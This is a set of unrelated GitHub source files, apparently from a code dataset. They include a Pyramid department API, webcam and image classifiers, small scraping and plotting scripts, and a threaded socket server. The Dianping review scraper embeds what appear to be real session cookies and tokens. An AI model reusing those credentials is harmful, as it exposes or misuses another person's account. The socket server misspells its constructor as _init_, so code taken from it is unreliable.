department.id,\n# 'name': department.name,\n# 'thumbnail_full_path': department.thumbnail.full_path if department.thumbnail else None,\n# }\n# ]\n#\n#\n# @view_config(\n# route_name='get_departments',\n# renderer='json'\n# )\n# def get_departments(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# sql_query = \"\"\"select\n# \"SimpleEntities\".id\n# \"SimpleEntities\".name\n# from \"Departments\"\n# join \"SimpleEntities\" on \"Departments\".id = \"SimpleEntities\".id\n# order by \"SimpleEntities\".name\n# \"\"\"\n#\n# result = DBSession.connection().execute(sql_query)\n#\n# return [\n# {\n# 'id': r[0],\n# 'name': r[1]\n# }\n# for r in result.fetchall()\n# ]\n#\n#\n# @view_config(\n# route_name='delete_department',\n# permission='Delete_Department'\n# )\n# def 
delete_department(request):\n# \"\"\"deletes the department with the given id\n# \"\"\"\n# department_id = request.matchdict.get('id')\n# department = Department.query.get(department_id)\n# name = department.name\n#\n# if not department:\n# transaction.abort()\n# return Response(\n# 'Can not find a Department with id: %s' % department_id, 500\n# )\n#\n# try:\n# DBSession.delete(department)\n# transaction.commit()\n# except Exception as e:\n# transaction.abort()\n# c = StdErrToHTMLConverter(e)\n# transaction.abort()\n# return Response(c.html(), 500)\n#\n# request.session.flash(\n# 'success: %s Department is deleted '\n# 'successfully' % name\n# )\n#\n# return Response('Successfully deleted department: %s' % department_id)\n\n\n@view_defaults(renderer='json')\nclass DepartmentViews(EntityViews):\n \"\"\"views for Department instances\n \"\"\"\n som_class = Department\n local_params = [\n {\n 'param_name': 'user_id',\n 'arg_name': 'users',\n 'is_list': True,\n 'interpreter': simple_entity_interpreter\n },\n ]\n\n @view_config(\n route_name='department',\n request_method='GET'\n )\n def get_entity(self):\n \"\"\"returns one Department instance data as JSON\n \"\"\"\n response = super(DepartmentViews, self).get_entity()\n\n # get entity type\n from stalker import SimpleEntity\n from stalker.db.session import DBSession\n entity_type = DBSession.query(SimpleEntity.entity_type)\\\n .filter(SimpleEntity.id == self.entity_id)\\\n .first()[0]\n\n # get user count\n from stalker import DepartmentUser\n user_count = DBSession\\\n .query(DepartmentUser.user_id)\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .count()\n\n from stalker_pyramid import entity_type_to_url\n data = {\n 'user_roles': {\n '$ref': '%s/%s/user_roles' %\n (entity_type_to_url[entity_type], self.entity_id),\n 'length': user_count\n },\n 'users': {\n '$ref': '%s/%s/users' %\n (entity_type_to_url[entity_type], self.entity_id),\n 'length': user_count\n }\n }\n\n return self.update_response_data(response, data)\n\n @view_config(\n route_name='departments',\n request_method='GET'\n )\n def get_entities(self):\n \"\"\"returns all Department instances\n \"\"\"\n return super(DepartmentViews, self).get_entities()\n\n @view_config(\n route_name='department',\n request_method=['PATCH', 'POST']\n )\n def update_entity(self):\n \"\"\"updates a Department instance\n \"\"\"\n return super(DepartmentViews, self).update_entity()\n\n @view_config(\n route_name='departments',\n request_method='PUT'\n )\n def create_entity(self):\n \"\"\"creates a Department instance\n \"\"\"\n return super(DepartmentViews, self).create_entity()\n\n @view_config(\n route_name='department',\n request_method='DELETE'\n )\n def delete_entity(self):\n \"\"\"deletes a Department instance\n \"\"\"\n return super(DepartmentViews, self).delete_entity()\n\n @view_config(\n route_name='department_users',\n request_method='GET'\n )\n def get_users(self):\n \"\"\"returns department users as JSON data\n # \"\"\"\n from stalker import DepartmentUser, User\n join = User, DepartmentUser.user\n filters = [DepartmentUser.department_id == self.entity_id]\n filters.extend(self.filter_generator(User))\n return self.collection_query(User, join=join, filters=filters)\n\n @view_config(\n route_name='department_users',\n request_method=['PATCH', 'POST']\n )\n def update_users(self):\n \"\"\"updates Department.users\n \"\"\"\n # get user ids\n user_ids = self.get_multi_integer(self.request, 'user_id')\n from stalker import User\n users = 
User.query.filter(User.id.in_(user_ids)).all()\n\n from stalker.db.session import DBSession\n if self.request.method == 'PATCH':\n with DBSession.no_autoflush:\n self.entity.users += users\n elif self.request.method == 'POST':\n with DBSession.no_autoflush:\n self.entity.users = users\n\n @view_config(\n route_name='department_users',\n request_method='DELETE'\n )\n def remove_users(self):\n \"\"\"removes users from Department.users attribute\n \"\"\"\n # get user ids\n user_ids = self.get_multi_integer(self.request, 'user_id')\n from stalker import User\n users = User.query.filter(User.id.in_(user_ids)).all()\n\n from stalker.db.session import DBSession\n with DBSession.no_autoflush:\n for user in users:\n try:\n self.entity.users.remove(user)\n except ValueError:\n pass\n\n DBSession.flush()\n\n @view_config(\n route_name='department_user_roles',\n request_method='GET'\n )\n def get_user_roles(self):\n \"\"\"returns department users as JSON data\n \"\"\"\n sql = \"\"\"\n select\n user_se.id,\n user_se.name,\n user_se.entity_type,\n\n role_se.id,\n role_se.name,\n role_se.entity_type\n from \"Department_Users\" as du\n join \"SimpleEntities\" as user_se on du.uid = user_se.id\n left outer join \"SimpleEntities\" as role_se on du.rid = role_se.id\n where du.did = :id\n \"\"\"\n from sqlalchemy import text\n from stalker.db.session import DBSession\n conn = DBSession.connection()\n result = conn.execute(text(sql), id=self.entity_id).fetchall()\n\n from stalker_pyramid import entity_type_to_url\n data = [{\n 'user': {\n 'id': r[0],\n 'name': r[1],\n 'entity_type': r[2],\n '$ref': '%s/%s' % (entity_type_to_url[r[2]], r[0])\n },\n 'role': {\n 'id': r[3],\n 'name': r[4],\n 'entity_type': r[5],\n '$ref': '%s/%s' % (entity_type_to_url[r[5]], r[3])\n } if r[3] else None\n } for r in result]\n\n from pyramid.response import Response\n return Response(\n json_body=data,\n status=200\n )\n\n @view_config(\n route_name='department_user_roles',\n request_method=['PATCH', 'POST']\n )\n def update_user_role(self):\n \"\"\"updates user roles\n \"\"\"\n # get parameters\n user_role_ids = self.request.params.getall('user_role')\n\n from stalker import DepartmentUser\n for user_role_id in user_role_ids:\n user_id, role_id = user_role_id.split(',')\n\n department_user = DepartmentUser.query\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .filter(DepartmentUser.user_id == user_id)\\\n .first()\n\n if department_user:\n department_user.role_id = role_id\n\n @view_config(\n route_name='department_user_roles',\n request_method='DELETE'\n )\n def remove_user_role(self):\n \"\"\"removes user roles\n \"\"\"\n # get parameters\n user_ids = map(int, self.request.params.getall('user_id'))\n\n from stalker import DepartmentUser\n for user_id in user_ids:\n department_user = DepartmentUser.query\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .filter(DepartmentUser.user_id == user_id)\\\n .first()\n\n if department_user:\n department_user.role_id = None\n\n","repo_name":"eoyilmaz/stalker_pyramid2","sub_path":"stalker_pyramid/views/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":14522,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"8457905076","text":"\"\"\"\nTakes a shot every second and splits it in two. 
Saves the result in a \nfolder called 'frames'.\n\nTo quit camera mode, press ESC\n\"\"\"\n\nimport cv2\nimport os\nimport time\nimport shutil\nimport tensorflow as tf\nimport pandas as pd\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import load_model\n\n#labels = {0: 'bateau', 1: 'bol', 2: 'chat', 3: 'coeur', 4: 'cygne', 5: 'lapin', 6: 'maison', 7: 'marteau', 8: 'montagne', 9: 'pont', 10: 'renard', 11: 'tortue'}\n\nlabels = ['bateau', 'bol', 'chat', 'coeur', 'cygne', 'lapin', 'maison', 'marteau', 'montagne', 'pont', 'renard', 'tortue']\n# Must import model.h5 as model\n\nmodel_path = \"tangram_jason_mobilenetv2.h5\"\nmodel = load_model(model_path)\n\n#Change to 1 to get webcam\ncam = cv2.VideoCapture(1)\n\ncv2.namedWindow(\"Camera Shot\")\n\nimg_counter = 0\n\nres_A = {label:[] for label in labels}\nres_B = {label:[] for label in labels}\n\nif not os.path.exists('frames/'):\n os.makedirs('frames/')\nelse:\n shutil.rmtree('frames/')\n os.makedirs('frames/')\n\nwhile True:\n start_time = time.time()\n ret, frame = cam.read()\n if not ret:\n print(\"failed to grab frame\")\n break\n cv2.imshow(\"Camera Shot\", frame)\n\n height, width, dim = frame.shape\n width_cutoff = width // 2\n s1 = frame[:, :width_cutoff]\n s2 = frame[:, width_cutoff:]\n\n # Resize image to expected size for the model and expansion of dimension from 3 to 4\n dim = (224, 224)\n # s1_up = tf.image.resize(s1/255, (224,224), preserve_aspect_ratio=False)\n s1_up = cv2.resize(s1/255, dim)\n # s1_final = tf.expand_dims(s1_up, axis=0)\n s1_final = s1_up.reshape(1, s1_up.shape[0], s1_up.shape[1], s1_up.shape[2])\n # s2_up = tf.image.resize(s2, (224,224), preserve_aspect_ratio=False)\n s2_up = cv2.resize(s2/255, dim)\n # s2_final = tf.expand_dims(s2_up, axis=0)\n s2_final = s2_up.reshape(1, s2_up.shape[0], s2_up.shape[1], s2_up.shape[2])\n \n # Prediction and creation of results dictionaries\n result_1 = model.predict(s1_final)\n result_2 = model.predict(s2_final)\n\n #best_result_A=labels[np.argmax(result_1[0])]\n #best_result_B=labels[np.argmax(result_2[0])]\n\n top_5_A = result_1[0].argsort()[::-1][:5]\n top_5_B = result_2[0].argsort()[::-1][:5]\n\n top_l_A = [labels[p] for p in top_5_A]\n top_l_B = [labels[p] for p in top_5_B]\n\n #Keep up for the dataframe\n for i, label in enumerate(labels):\n res_A[label].append(result_1[0][i])\n res_B[label].append(result_2[0][i])\n end_time = time.time()\n total_fps = 1/(end_time-start_time)\n print(\"Total time:\",end_time-start_time)\n print(\"FPS:\",total_fps, '\\n')\n\n print(\"Image A\")\n print(\"Best result: \", top_l_A[0], '\\n')\n print(\"Top 5:\")\n for i in range(1,5):\n print(i, \": \", top_l_A[i])\n print('\\n')\n print(\"Image B\")\n print(\"Best result: \", top_l_B[0], '\\n')\n print(\"Top 5:\")\n for i in range(1,5):\n print(i, \": \", top_l_B[i])\n print('\\n\\n')\n\n #Takes a shot every second\n img_name_A = \"frames/frame_{}-A.jpg\".format(img_counter)\n img_name_B = \"frames/frame_{}-B.jpg\".format(img_counter)\n cv2.imwrite(img_name_A, s1)\n cv2.imwrite(img_name_B, s2)\n print(\"{} written!\".format(img_name_A.replace(\"-A.jpg\",\"\")))\n \n img_counter += 1\n time.sleep(1)\n\n k = cv2.waitKey(1)\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n \n\ncam.release()\n\ncv2.destroyAllWindows()\n\ndf_A = pd.DataFrame(res_A)\ndf_B = pd.DataFrame(res_B)\n\ndf_A.to_csv('results_A.csv')\ndf_B.to_csv('results_B.csv')\n\nshutil.make_archive('images', 'zip', 'frames/')","repo_name":"bintou579/Projet_detection_Tangram","sub_path":"modules/get_img_from_webcam.py","file_name":"get_img_from_webcam.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15976627162","text":"\ndef is_beatiful(board,n, range_row, range_columns):\n for i in range(n):\n for j in range(n):\n current = board[i][j]\n range_row[current] +=1\n if range_row[current] != (i+1):\n return \"NO\"\n\n for i in range(n):\n for j in range(n):\n current = board[j][i]\n range_columns[current] +=1\n if range_columns[current] != (i+1):\n return \"NO\"\n \n return \"YES\"\n \n\ndef solve():\n n = int(input())\n _range = {}\n for i in range(1,n+1):\n _range.update({i:0})\n board = []\n for i in range(n):\n board.append(list(map(int,input().split())))\n \n print(is_beatiful(board,n, _range,_range.copy()))\n\n\n\n\nsolve()","repo_name":"TatoNaranjo/Codeforces-Solutions","sub_path":"Practice ICPC/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43242082484","text":"from torch import nn\nfrom torchvision import models\n\n\nclass Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n\n model_ft = models.resnet18()\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Sequential(\n nn.Dropout(0.6),\n nn.Linear(num_ftrs, 256),\n nn.Dropout(0.6),\n nn.Linear(256, 10)\n )\n\n self.layers = model_ft\n\n def forward(self, x):\n return self.layers(x)\n\n\n","repo_name":"rogierknoester/omniart_eye_classifier","sub_path":"omniart_eye_classifier/classifier_model.py","file_name":"classifier_model.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7728549161","text":"import pathlib\nimport phantomconfig as pc\nfrom .stub import test_data, test_phantom_file\n\n\ndef test_write_phantom_config():\n 'Test writing Phantom config files.'\n tmp_file = pathlib.Path('tmp.in')\n conf = pc.read_config(test_phantom_file)\n conf.write_phantom(tmp_file)\n conf = pc.read_config(tmp_file)\n assert (conf.config == test_data.config)\n assert (conf.header == test_data.header)\n assert (conf.datetime == test_data._datetime)\n tmp_file.unlink()\n","repo_name":"menna161/API-Wizard","sub_path":"PyAroma/datasets/datetime/snippets/snippet1232758.py","file_name":"snippet1232758.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15853218172","text":"import requests\nimport time\nimport csv\nfrom http.cookies import SimpleCookie\n\nurl = \"http://www.dianping.com/overseas/shop/ajax/allReview\"\nparams = {\n \"shopId\": \"\",\n \"cityId\": \"2311\", # Singapore\n \"categoryURLName\": \"food\",\n \"power\": \"5\",\n \"cityEnName\": \"singapore\",\n \"shopType\": \"10\",\n \"_token\": \"eJyNjVtPgzAAhf9Ln8naQrmUtzFkmQHcBkyjMYZt3ORWoBlM43+3i/jik8lJvpMvJzmfoN+cgYkRQgRLgA+iq4pMNU2XMUaKBE5/nG5I4NgfbGC+YCojiVD0ejN7IX4MRoZQv52ILhOR22ojRiDnnJkQjuO4OBdxw4omW5zaGg55yyClKlapAqR/zWCfXIpkfIurCjIMxEUdigvBcmY8k88ciqwBJkjupzAoyRBEytbVWs9O3SkwJp9HivuB6D4wyNA9hf4SPrge3AZ34+VaYNfKGGG8PK7z9rmz0qbqokeZ1b2zTktnZztugH07Qvzds5NyKOwD5tZytVtB39I98PUNR+5raQ==\"\n}\nheaders = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 
'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Host': 'www.dianping.com',\n 'Pragma': 'no-cache',\n 'Referer': 'http://www.dianping.com/shop/9951593',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n}\n\nraw_data = \"cy=2311; _lxsdk_cuid=164e476a159c8-0d29a955cfd024-2711938-1fa400-164e476a15ac8; _lxsdk=164e476a159c8-0d29a955cfd024-2711938-1fa400-164e476a15ac8; _hc.v=945ccfd5-f0ef-5ced-96a6-57b81e5368d1.1532841337; s_ViewType=1; ua=dpuser_4252403616; ctu=0c4ac1d1f837a576bedf3401825fa1532dcac384129922ab18742b378372f91f; __mta=88340260.1532841356020.1532966725733.1533207768798.9; JSESSIONID=2376D714B00477B84DDBE15F56A6B3A4; _thirdu.c=cce17ce5b0b1058454459bc4e82e1b49; lgtoken=08fe9c1c8-b423-4c44-b226-f86a6fcf0845; thirdtoken=91385117C0E327C3C7653E4050175B65; dper=a74568066ab518cd86edf71992682dfcfa816ed7ed2d69cb9ad21f48efcc361f2d51b7bf4b414083dbcac3425b0cebb36cacc3cd80cfd57a853f5906324fabeb23246eae3ed28e1254ca54f9e74b9636dbe4fcdbea91d8444d02b1782a2325e9; ll=7fd06e815b796be3df069dec7836c3df; uamo=85023591; _lxsdk_s=1668764b4ed-5b9-d82-f72%7C%7C82\"\ncookie = SimpleCookie()\ncookie.load(raw_data)\n\ncookies = {}\nfor key, morsel in cookie.items():\n cookies[key] = morsel.value\n\n\ndef get_reviews_from_api(shop_id):\n params[\"shopId\"] = int(shop_id)\n review_list = list() # store all the reviews crawled\n dish_list = list() # store all the dish names crawled\n\n try:\n print(\"fetching data - \" + shop_id)\n r = requests.get(url, params=params, headers=headers, cookies=cookies)\n # print(r.text)\n resp = r.json()\n\n dish_list.extend(resp[\"dishTagStrList\"])\n reviews = resp[\"reviewDataList\"]\n for review in reviews:\n restaurant_id = review[\"shopId\"]\n user_id = review[\"userId\"]\n body = review[\"reviewBody\"]\n star = review[\"star\"][\"value\"]\n add_time = review[\"addTime\"]\n review_list.append([restaurant_id, user_id, body, star, add_time])\n \n # Consolidate all the reviews into csv\n with open(\"reviews.csv\", \"a\", encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for review in review_list:\n # print(review)\n writer.writerow(review)\n\n except Exception as e:\n print(\"Error in requesting from \" + shop_id)\n print(e)\n return None\n\n\nwith open(\"data/restaurant-sg.txt\", \"r\") as restaurant_file:\n for line in restaurant_file:\n print(\"Crawling start - \" + line)\n parts = line.split('/')\n shop_id = parts[len(parts) - 1]\n get_reviews_from_api(shop_id)\n time.sleep(1)\n","repo_name":"hbwzhsh/sentiment-analysis-cn","sub_path":"dianping-sg-comments-restful.py","file_name":"dianping-sg-comments-restful.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25756746314","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\ndf = pd.read_csv(\"C:\\\\Users\\\\raks2\\\\Downloads\\\\iphone_purchase_records.csv\")\r\nprint(df)\r\n\r\nprint(df.describe())\r\n\r\n\r\nmales_above_25_df = df.loc[(df[\"Gender\"] == \"Male\") & (df[\"Age\"]>25) & (df[\"Purchase Iphone\"]== 1)]\r\nprint(males_above_25_df)\r\nfig_001 = px.bar(x=males_above_25_df.Age, y =males_above_25_df.Salary, title=\"Males above the age of 25\", labels = {\"Age\": \"Age\", 
\"Salary\": \"Salary\"})\r\nfig_001.update_layout(xaxis_title=\"Age\", yaxis_title = \"Salary\")\r\nfig_001.show()\r\n\r\n\r\n\r\n\r\nfemale_above_30k_df = df.loc[(df[\"Gender\"] == \"Female\") & (df[\"Salary\"] > 30000) & (df[\"Purchase Iphone\"]== 1)]\r\nprint(female_above_30k_df)\r\nfig_002 = px.scatter(data_frame=female_above_30k_df, x= \"Age\", y=\"Salary\", title=\"Females above the salary of 30k\", size=\"Salary\", labels = {\"Age\": \"Age\", \"Salary\": \"Salary\"})\r\nfig_002.update_layout(xaxis_title=\"Age\", yaxis_title=\"Salary\")\r\nfig_002.show()\r\n\r\n\r\n\r\nsalary_desc_df = df.sort_values(by = [\"Salary\"], ascending= False)\r\nmale_buyer_salAbove_50k_df = df.loc[(df[\"Salary\"]>=50000) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Male\")]\r\nfemale_buyer_salAbove_50k_df = df.loc[(df[\"Salary\"]>=50000) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Female\")]\r\nfig_003 = go.Figure(go.Scatter(x = male_buyer_salAbove_50k_df.Age, y=male_buyer_salAbove_50k_df.Salary, name = \"Male\", mode = 'lines'))\r\nfig_003.add_trace(go.Scatter( x = female_buyer_salAbove_50k_df.Age, y=female_buyer_salAbove_50k_df.Salary, name = \"Female\", mode = 'lines'))\r\nfig_003.update_layout(title=\"Buyers above 50k Salary\",xaxis_title = \"Age of Buyers\", yaxis_title = \"Salary of Buyers\")\r\nfig_003.show()\r\n#print(buyer_salAbove_50k_df)\r\n\r\n\r\n\r\n\r\nmalebuyer_below30 = df.loc[(df[\"Age\"]<=30) & (df[\"Purchase Iphone\"] == 1) &(df[\"Gender\"] == \"Male\")]\r\nfemalebuyer_below30 = df.loc[(df[\"Age\"]<=30) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Female\")]\r\nfig_004 = go.Figure(go.Scatter(x = malebuyer_below30.Age, y = malebuyer_below30.Salary, mode = \"markers\", name=\"Male\",showlegend=True, marker_size = [20,30,40,50]))\r\nfig_004.add_trace(go.Scatter(x = femalebuyer_below30.Age, y = femalebuyer_below30.Salary, mode = \"markers\", name=\"Female\", marker_size = [20,30]))\r\nfig_004.update_layout(title = \"Buyers below the age of 30\", xaxis_title = \"Age\", yaxis_title = \"Salary\")\r\nfig_004.show()\r\n\r\n#print(buyer_below30)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Rax2147/iphone-sales-analysis-project","sub_path":"apl_file_1.py","file_name":"apl_file_1.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1724474617","text":"from django import forms\nfrom .validators import validate_file_size\n\nSEND_TO_OPTIONS = [\n (\"exec\", \"All Exec\"),\n (\"preswelfare\", \"President, Welfare & Inclusivity\"),\n (\"president\", \"President\"),\n (\"secretary\", \"Secretary\"),\n (\"treasurer\", \"Treasurer\"),\n (\"academic\", \"Academic Coordinator\"),\n (\"gaming\", \"Gaming Coordinator\"),\n (\"tech\", \"Tech Officer\"),\n (\"inclusivity\", \"Inclusivity Officer\"),\n (\"socials\", \"Social Secretary\"),\n (\"welfare\", \"Welfare Officer\"),\n]\n\n\nclass ReportForm(forms.Form):\n send_to = forms.CharField(widget=forms.Select(choices=SEND_TO_OPTIONS))\n message = forms.CharField(widget=forms.Textarea, required=True)\n ev_file = forms.FileField(required=False, validators=[validate_file_size])\n","repo_name":"UWCS/uwcs-dextre","sub_path":"report/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39869992715","text":"import requests as rq\r\nimport math\r\nfrom bs4 import BeautifulSoup as 
bs\r\n\r\nclass webscraping:\r\n def fetch_game_status(web):\r\n if web.status_code == 404: return print(f'Invalid . . . {web.url}')\r\n new = bs(web.text, 'html.parser') # Let's BeautifulSoup read text respone from request.\r\n web.close()\r\n fetch = new.find_all(\"p\", {\"class\":\"text-lead font-caption-body wait-for-i18n-format-render\"}) # Fetch data that's format with header and classes. // form to array.\r\n\r\n data = str(fetch[0]).split('

')[1].split('

')[0] # spliting texts for capture only data.\r\n data2 = str(fetch[3]).split('

')[1].split('

')[0] # same as upper one. // we put string because they have non-type\r\n data = data.split(',') # The data of first one return string value with \",\" so we need to cut it then Transfer to Integers.\r\n formator_data1 = int(data[0]+data[1]) # from the upper one, we have splited \",\" so new the list data looks like this ('num', 'num2') and now format it.\r\n formator_data2 = int(data2)\r\n\r\n print(f'\\n\\nPlaying : {formator_data1} (Real-time)')\r\n print(f'Max players : {formator_data2} (Per Room)')\r\n print(f'Server Total : {math.floor(formator_data1/formator_data2)} (Around the following)') # Calculate total of servers\r\n\r\nif __name__ == '__main__':\r\n gets = str(input('Enter game id : ')) # insert game's id.\r\n url = f\"https://www.roblox.com/games/{gets}/\"\r\n web = rq.get(url) # Send Request to webpage.\r\n runtime = webscraping.fetch_game_status(web) # main dish\r\n","repo_name":"latatan/Rei.py","sub_path":"rei.py","file_name":"rei.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9083994570","text":"from datetime import datetime, timedelta\nfrom collections import defaultdict\n\n\nusers = [{\"name\": \"Roblen\", \"birthday\": datetime(2000, 1, 3)},\n {\"name\": \"Lunio\", \"birthday\": datetime(1942, 7, 23)},\n {\"name\": \"Persostrat\", \"birthday\": datetime(1988, 5, 22)},\n {\"name\": \"Pores\", \"birthday\": datetime(1987, 5, 22)},\n {\"name\": \"Yavliga\", \"birthday\": datetime(2002, 7, 30)},\n {\"name\": \"Nikoglay\", \"birthday\": datetime(1976, 7, 27)},\n {\"name\": \"Bucefal\", \"birthday\": datetime(2004, 5, 22)},\n {\"name\": \"Lubomir\", \"birthday\": datetime(1950, 7, 23)},\n {\"name\": \"Sigizmund\", \"birthday\": datetime(1078, 7, 22)},\n {\"name\": \"Melaniya\", \"birthday\": datetime(1996, 7, 27)},\n {\"name\": \"Aslan\", \"birthday\": datetime(2001, 8, 1)},\n {\"name\": \"Oxana\", \"birthday\": datetime(1995, 7, 28)}]\n\n\nweek = {\n 0: \"Monday\",\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\",\n \"next\": \"Next Monday\"\n}\n\ncelebrate_dict = defaultdict(list)\n\n\ndef get_birthdays_per_week(users):\n delta_forward = timedelta(days=7)\n delta_back = timedelta(days=2)\n\n current_date = datetime.now().date()\n finish_diapazon = current_date + delta_forward\n start_diapazon = current_date - delta_back\n\n celebrate_list = []\n\n for user in users:\n birth_day = user[\"birthday\"].date()\n birth_day = birth_day.replace(year=current_date.year)\n\n if start_diapazon <= birth_day <= finish_diapazon:\n birth_day_weekday = birth_day.weekday()\n\n if start_diapazon <= birth_day < current_date and birth_day_weekday in (5, 6) and current_date.weekday() == 0:\n user.update({\"today\": True})\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} было в {week[ birth_day_weekday]} нужно поздравить сегодня\")\n\n elif current_date == birth_day and birth_day_weekday in (5, 6):\n celebrate_list.append(user)\n print(f\"Готовьтесь поздравлять в понедельник {user['name']}\")\n\n elif current_date == birth_day:\n celebrate_list.append(user)\n print(f\"Бегите уже поздравлять {user['name']}\")\n\n elif current_date < birth_day <= finish_diapazon and birth_day_weekday in range(5, 6+1):\n user.update({\"next\": True})\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} только будет в {week[ birth_day_weekday]} нужно поздравить в следующий понедельник\")\n\n elif 
current_date < birth_day <= finish_diapazon and (birth_day_weekday in range(0, 4+1)):\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} будет в {week[ birth_day_weekday]} нужно поздравить\")\n\n for celebrator in celebrate_list:\n\n if celebrator.get(\"next\"):\n week_day = week[\"next\"]\n celebrate_dict[week_day].append(celebrator[\"name\"])\n continue\n\n elif celebrator.get(\"today\"):\n week_day = week[0]\n celebrate_dict[week_day].append(celebrator[\"name\"])\n continue\n\n birth_day = celebrator[\"birthday\"].date()\n birth_day = birth_day.replace(year=current_date.year)\n birth_day_weekday = birth_day.weekday()\n week_day = week[birth_day_weekday]\n\n celebrate_dict[week_day].append(celebrator[\"name\"])\n\n result = {\"Monday\": celebrate_dict.get(\"Monday\", []),\n \"Tuesday\": celebrate_dict.get(\"Tuesday\", []),\n \"Wednesday\": celebrate_dict.get(\"Wednesday\", []),\n \"Thursday\": celebrate_dict.get(\"Thursday\", []),\n \"Friday\": celebrate_dict.get(\"Friday\", []),\n \"Saturday\": celebrate_dict.get(\"Saturday\", []),\n \"Sunday\": celebrate_dict.get(\"Sunday\", []),\n \"Next Monday\": celebrate_dict.get(\"Next Monday\", []), }\n\n print(result)\n return (result)\n\n\nget_birthdays_per_week(users)\n","repo_name":"Yevhenii3145/python-core-home_work_8","sub_path":"get_birthdays_per_week.py","file_name":"get_birthdays_per_week.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29622792715","text":"import socket\nimport sys\nimport threading\nfrom datetime import datetime\n\n\nclass ClientThread(threading.Thread):\n def _init_(self, clientAddress, clientsocket):\n threading.Thread._init_(self)\n self.csocket = clientsocket\n\n def run(self):\n global cn\n self.csocket.send(bytes(\"Hi, I am the Server..\",'utf-8'))\n print(\"Connection from : \", cn)\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n msg = ''\n while True:\n data = self.csocket.recv(2048)\n msg = data.decode()\n if msg == 'bye':\n cn=cn-1\n break\n print(\"from client\", msg)\n self.csocket.send(bytes(msg[::-1], 'UTF-8'))\n print(\"Client at \", clientAddress, \" disconnected...\")\n\ncn=0\nLOCALHOST = \"127.0.0.1\"\nPORT = int(sys.argv[1])\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind((LOCALHOST, PORT))\nprint(\"Server started\")\nprint(\"Waiting for client request..\")\nwhile True:\n server.listen(1)\n clientsock, clientAddress = server.accept()\n cn=cn+1\n newthread = ClientThread(clientAddress, clientsock)\n newthread.start()","repo_name":"mkk96/SSD-Labs","sub_path":"Lab 11/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30160478066","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nfrom torchvision.transforms import transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import make_grid, save_image\n\nfrom utilis.DataHelper import *\n\n# Chose models\nfrom networks.U_Net import UNet # U-Net\nfrom networks.Attention_UNet import Att_UNet # Attention U-Net\nfrom networks.AB_UNet import AB_UNet # AB-UNet\nfrom utilis.utilis import ImageEval_\n\n# CUDA\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef 
